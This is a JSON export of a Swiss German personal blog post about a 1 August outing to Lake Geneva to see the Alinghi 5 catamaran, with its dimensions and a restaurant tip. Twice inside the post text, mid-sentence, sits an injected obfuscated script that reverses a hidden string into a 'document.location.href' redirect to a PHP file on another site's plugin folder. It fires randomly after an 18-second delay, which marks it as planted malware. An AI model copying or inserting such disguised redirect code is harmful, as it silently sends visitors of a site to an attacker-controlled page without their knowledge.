{"id":583,"date":"2009-08-01T20:07:11","date_gmt":"2009-08-01T19:07:11","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?p=583"},"modified":"2013-02-13T11:19:38","modified_gmt":"2013-02-13T10:19:38","slug":"1-august-alinghi-5-und-nationalfeiertag","status":"publish","type":"post","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/archives\/583","title":{"rendered":"1. August, Alinghi 5 und Nationalfeiertag"},"content":{"rendered":"<p>Hi zusammen<\/p>\n<p>den 1. August, also unseren Nationalfeiertag und Geburtstag der Schweiz, hab ich mit nem <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tollen Ausflug erlebt. Wir haben uns entschlossen, eine sch\u00f6ne Fahrt an den Genfersee (Lac L\u00e9man) zu unternehmen und dort die Alinghi 5 zu besichtigen. Gut das ging nat\u00fcrlich nur von weitem, daf\u00fcr ist\u00a0 dieser neue und weltweit gr\u00f6sste Katamaran absolut eindr\u00fccklich. Wir konnten bis auf 30 m ran und entsprechend <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tolle Bilder machen. Die Alinghi 5 hat einen 50 m hohen Mast und ist 25 m breit.<\/p>\n<p>Hier noch genauer Angaben zu den Massen:<\/p>\n<p>Das Ger\u00e4t mit einer Wasserlinie von 90 Fuss (27,5 Meter) ist etwa 25 Meter breit, ist \u00fcber den Bugspriet gemessen (Spitze des Mittelteils) rund 35 Meter lang und wiegt zwischen 12 und 15 Tonnen. Die gesamte Segelfl\u00e4che betr\u00e4gt \u00fcber 1000 Quadratmeter. Der Mast misst rund 50 Meter, so hoch wie ein 18-st\u00f6ckiges Haus. Echt gigantisch.<\/p>\n<p>Diese Alinghifeier (<a title=\"Alinghi 5\" href=\"http:\/\/www.alinghi.com\/de\/news\/news\/index.php?idIndex=200&amp;idContent=20106\" target=\"_blank\">http:\/\/www.alinghi.com\/de\/news\/news\/index.php?idIndex=200&amp;idContent=20106<\/a>) hat dann auch zig-tausende Menschen an die verschiednen Hafen-Orte gelockt. Wir waren zuerst am Hafen Lausanne-Ouchy und dann noch in Morges. Bis Genf war doch ein bisschen weit&#8230;<\/p>\n<p>Das Wetter war ja einsame Klasse und so konnten wir den ganzen Tag und den Abend dieses Nationalfeiertages vollumf\u00e4nglich geniessen.<\/p>\n<p>Sch\u00f6ne Eindr\u00fccke im Lavaux Gebiet genossen wir dann auch beim Mittagessen in Grandvaux. Das Restaurant befindet sich an einer traumhaften Lage und bietet eine super K\u00fcche zum moderaten Preis.\u00a0 Echt eine Reise wert (<a title=\"Auberge de la Gare Grandvaux\" href=\"http:\/\/www.aubergegrandvaux.ch\/de\/acces.html\" target=\"_blank\">http:\/\/www.aubergegrandvaux.ch\/de\/acces.html<\/a>).<\/p>\n<p>Hey und das 1. August-Feuer war dieses Jahr genau vor unserem Haus, so hatten wir eine super Sicht.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi zusammen den 1. August, also unseren Nationalfeiertag und Geburtstag der Schweiz, hab ich mit nem tollen Ausflug erlebt. Wir haben uns entschlossen, eine sch\u00f6ne Fahrt an den Genfersee (Lac L\u00e9man) zu unternehmen und dort die Alinghi 5 zu besichtigen. Gut das ging nat\u00fcrlich nur von weitem, daf\u00fcr ist\u00a0 dieser neue und weltweit gr\u00f6sste Katamaran&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[94,90,82,91,97,92,96,93,95,79],"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/583"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=583"}],"version-history":[{"count":11,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/583\/revisions"}],"predecessor-version":[{"id":1109,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/583\/revisions\/1109"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=583"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/categories?post=583"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/tags?post=583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}